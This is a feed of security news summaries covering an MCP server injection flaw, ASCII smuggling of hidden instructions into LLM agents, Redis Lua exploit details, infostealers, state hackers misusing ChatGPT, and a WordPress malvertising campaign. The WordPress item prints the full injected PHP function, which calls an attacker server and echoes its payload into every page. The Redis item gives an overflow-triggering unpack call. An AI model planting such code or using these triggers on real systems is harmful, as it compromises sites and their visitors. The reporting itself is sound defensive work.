• Cybersecurity researchers have disclosed details of a now-patched vulnerability in the popular figma-developer-mcp Model Context Protocol (MCP) server that could allow attackers to achieve code execution. The vulnerability, tracked as CVE-2025-53967 (CVSS score: 7.5), is a command injection bug stemming from the unsanitized use of user input, opening the door to a scenario where an attacker can

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Enterprise AI assistants face a hidden menace when invisible control characters are used to smuggle malicious instructions into prompts. In September 2025, FireTail researcher Viktor Markopoulos tested several large language models (LLMs) for susceptibility to the long-standing ASCII Smuggling technique. His findings reveal that some widely adopted services still fail to strip out hidden Unicode tags, […]

    The post ASCII Smuggling Attack in Gemini Tricks AI Agents into Revealing Smuggled Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Three newly disclosed vulnerabilities have been identified in the Lua scripting engine of Redis 7.4.5, each presenting severe risks of remote code execution and privilege escalation

    Redrays has released a detailed proof-of-concept (PoC) to exploit these vulnerabilities, which is now publicly available. Organizations are urged to act immediately.

    Use-After-Free Flaw (CVE-2025-49844)

    This vulnerability arises when TString objects are not properly protected during script parsing. Specifically, in luaY_parser, the Lua parser neglects to safeguard a newly created TString, making it susceptible to premature garbage collection and use-after-free conditions:

    PoC Exploit Released Lua Engine Vulnerabilities

    The patched code protects the object on the stack before parsing:

    PoC Exploit Released Lua Engine Vulnerabilities

    Attackers can exploit this issue for remote code execution by carefully triggering garbage collection during the parsing process.

    Integer Overflow Vulnerability (CVE-2025-46817)

    The unpack() function incorrectly calculates element counts, enabling stack corruption when called with extreme range parameters. 

    By manipulating arguments such as unpack({1,2,3}, -2, 2147483647), attackers could bypass array bounds and even execute arbitrary code.

    Metatable Privilege Escalation Flaw (CVE-2025-46818)

    This flaw allows modification of essential metatables, like those for strings and numbers, because they are not properly protected as read-only. 

    By altering metatables, a malicious actor may inject logic that performs privilege escalation or code execution in the context of other users.

    RedRays stated that a robust Python-based PoC verifies the criticality of all three vulnerabilities. The PoC automates:

    • Aggressive heap and garbage collection stress tests for use-after-free exploitation (CVE-2025-49844),
    • Fuzzing of the unpack() call to trigger integer overflow and stack corruption (CVE-2025-46817),
    • Manipulation of basic type metatables to prove privilege escalation via crafted Lua scripts (CVE-2025-46818).

    The code connects to a target Redis instance and runs up to ten full-stack tests, confirming exploitability and the presence or absence of proper patching. 

    These technical checks leverage custom Lua scripts sent via Redis EVAL commands, exposing vulnerable server states and printing crash/output evidence.

    CVETitleSeverity
    CVE-2025-49844Use-After-Free in Lua Parser (deps/lua/src/lparser.c:387)Critical
    CVE-2025-46817Integer Overflow in unpack() (deps/lua/src/lbaselib.c)Critical
    CVE-2025-46818Metatable Privilege Escalation (script_lua.c, eval.c)Critical

    Mitigations

    Redis administrators must immediately update to patched versions. These CVEs, confirmed by source review and practical exploitation, collectively expand the Redis attack surface, exposing production servers to real-world threats, especially where EVAL access is available. 

    Organizations running Redis 7.4.5 should deploy fixes without delay, as attackers can exploit these flaws to achieve full remote code execution and unauthorized privilege escalation.

    Immediate patching is essential for all internet-facing or untrusted Redis deployments.

    Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today

    The post PoC Exploit Released for Critical Lua Engine Vulnerabilities appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Shuyal Stealer is a recently uncovered infostealer that pushes the boundaries of traditional browser-targeted malware. Unlike most variants that zero in on popular platforms like Chrome and Edge, Shuyal dramatically widens its scope by targeting 19 different browsers, making it far more versatile and dangerous in its data-harvesting capabilities. Beyond the usual theft of browser-stored […]

    The post Shuyal Stealer Malware Exploits 19 Browsers to Steal Logins appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In an era where AI and SaaS applications underpin daily workflows, organizations face an unprecedented challenge: the invisible exfiltration of sensitive information. Traditional, file-based data loss prevention (DLP) measures were designed for attachments and downloads, but today’s risk landscape extends far beyond simple file movements. As employees increasingly rely on Generative AI tools and unmanaged […]

    The post 77% of Employees Share Company Secrets on ChatGPT Compromising Enterprise Policies appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • OpenAI announced it has banned a series of ChatGPT accounts linked to Chinese state-affiliated hacking groups that used the AI models to refine malware and create phishing content.

    The October 2025 report details the disruption of several malicious networks as part of the company’s ongoing commitment to preventing the abuse of its AI technologies by threat actors and authoritarian regimes.

    Since February 2024, OpenAI has disrupted over 40 networks that violated its usage policies. The company stated that it continues to see threat actors incorporate AI into existing strategies to increase speed and efficiency, rather than developing novel offensive capabilities with the models.

    China-Linked Actors Enhance Cyber Operations

    A key case study in the report focuses on a group named OpenAI, named “Cyber Operation Phish and Scripts.” This cluster of accounts, operated by Chinese-speaking individuals, was used to assist in malware development and phishing campaigns.

    OpenAI’s investigation found that the group’s activities were consistent with cyber operations serving the intelligence requirements of the People’s Republic of China (PRC). The activity also overlapped with threat groups publicly tracked as UNKDROPPITCH and UTA0388.

    These hackers used ChatGPT for two primary functions:

    • Malware Development: They used the AI to help develop and debug tooling, with implementation details overlapping with malware known as GOVERSHELL and HealthKick. The actors also researched further automation possibilities using other AI models like DeepSeek.
    • Phishing Content Generation: The group created targeted and culturally tailored phishing emails in multiple languages, including Chinese, English, and Japanese. Their targets included Taiwan’s semiconductor sector, U.S. academia, and organizations critical of the Chinese government.

    OpenAI noted that the actors used the models to gain “incremental efficiency,” such as crafting better phishing emails and shortening coding cycles, rather than creating new types of threats.

    The report also detailed the disruption of other accounts linked to Chinese government entities. These users attempted to employ ChatGPT for developing surveillance and profiling tools.

    One banned user sought help in drafting a proposal for a “High-Risk Uyghur-Related Inflow Warning Model,” designed to analyze travel bookings and police records.

    Another instance involved an attempt to design a “social media probe” capable of scanning platforms like X (formerly Twitter), Facebook, and Reddit for political, ethnic, and religious content deemed “extremist.”

    Other users were banned for using the AI to research critics of the Chinese government and identify the funding sources of accounts critical of the PRC.

    Mitigations

    In response to these findings, OpenAI disabled all accounts associated with the malicious activities and shared indicators of compromise with industry partners to aid in broader cybersecurity efforts.

    The report emphasizes that the AI models themselves often acted as a safety barrier, refusing direct requests to generate malicious code or execute exploits. The actors were limited to generating “building-block” code snippets that were not inherently malicious on their own.

    OpenAI’s findings indicate that while state-sponsored actors are actively experimenting with AI, its primary use is to augment existing operations.

    The company stressed that it continues to invest in detecting and disrupting such abuses to prevent its tools from being used for malicious cyber activity, scams, and covert influence operations.

    Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today

    The post OpenAI Banned ChatGPT Accounts Used by Chinese Hackers to Develop Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In a groundbreaking disclosure, CloudSEK’s TRIAD unit has unearthed internal operational materials that shed light on Charming Kitten (APT35), revealing an intricate espionage apparatus linked to Iran’s Islamic Revolutionary Guard Corps (IRGC). The leak comprises over 100 Persian-language files marked with Jalali calendar dates and aligned with Tehran time, underscoring its authenticity. At the apex, […]

    The post APT35: Inside the Structure, Toolset, and Espionage Operations of an IRGC-Linked Group appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In a sophisticated evolution of email-based attacks, adversaries have begun leveraging Cascading Style Sheets (CSS) to inject hidden “salt” — irrelevant content used to confuse detection systems — deep within HTML emails. Cisco Talos’s year-long monitoring (March 1, 2024 – July 31, 2025) reveals a marked increase in the abuse of CSS properties to conceal […]

    The post Hackers Exploit CSS Properties to Conceal Malicious Code in Hidden Text Salting Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • WordPress websites have become a prime target for threat actors seeking to monetize traffic and compromise visitor security.

    In recent months, a new malvertising campaign has emerged, leveraging silent PHP code injections within theme files to serve unwanted third-party scripts.

    The attack blends seamlessly with legitimate site operations, delivering obfuscated JavaScript that redirects visitors, displays pop-ups, and evades security tools without raising suspicion.

    Initially discovered by a site owner noticing unexplained script loads, the intrusion originated from a small block of PHP code appended to the active theme’s functions.php file.

    This injection did not alter visible page content, instead executing behind the scenes on every request.

    Sucuri analysts identified the campaign after detecting anomalous JavaScript calls to attacker-controlled domains and blocklisting by multiple security vendors.

    The attack primarily exploits weak file permissions and outdated themes. By gaining write access—often through compromised credentials or vulnerable plugins—hackers insert a seemingly benign function that contacts a command-and-control server.

    Once invoked via the wp_head hook, the function fetches a dynamic JavaScript payload and echoes it into the page’s <head> section, ensuring execution before the rest of the page loads.

    Sucuri researchers noted that the injected function establishes a POST connection to a remote endpoint at hxxps://brazilc[.]com/ads.php, retrieves the malicious script, and embeds it directly into the HTML document.

    The payload performs two main actions: loading a traffic-distribution script from porsasystem.com/6m9x.js and injecting a hidden 1×1 pixel iframe that mimics Cloudflare’s challenge platform.

    These techniques enable forced redirects, pop-ups, and evasion of security scanners by disguising malicious activity as legitimate CDN operations.

    Infection Mechanism

    The infection mechanism hinges on the following PHP function injected into functions.php:-

    // Injected PHP function in functions.php
    function ti_custom_javascript() {
        $response = wp_remote_post(
            'https://brazilc.com/ads.php',
            array('timeout' => 15, 'body' => array('url' => home_url()))
        );
        if (!is_wp_error($response)) {
            echo wp_remote_retrieve_body($response);
        }
    }
    add_action('wp_head', 'ti_custom_javascript');

    Upon each page load, this function silently executes, contacting the C&C server and printing the returned JavaScript payload into the page header.

    Payload (Source – Sucuri)

    The attacker’s script then loads further malicious code asynchronously, leveraging attributes like data-cfasync='false' and async to bypass Cloudflare Rocket Loader.

    By embedding within a hidden iframe, the malware evades detection and resides persistently until the injected code is removed.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cybersecurity researchers at GreyNoise have identified a dramatic escalation in malicious scanning activities targeting Palo Alto Networks PAN-OS GlobalProtect login portals, with attacks originating from over 2,200 unique IP addresses as of October 7, 2025. This represents a significant increase from the approximately 1,300 IPs initially observed on October 3, demonstrating the rapidly evolving nature […]

    The post Massive Attacks Targeting Palo Alto PAN-OS GlobalProtect Portals from 2,200 IPs appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶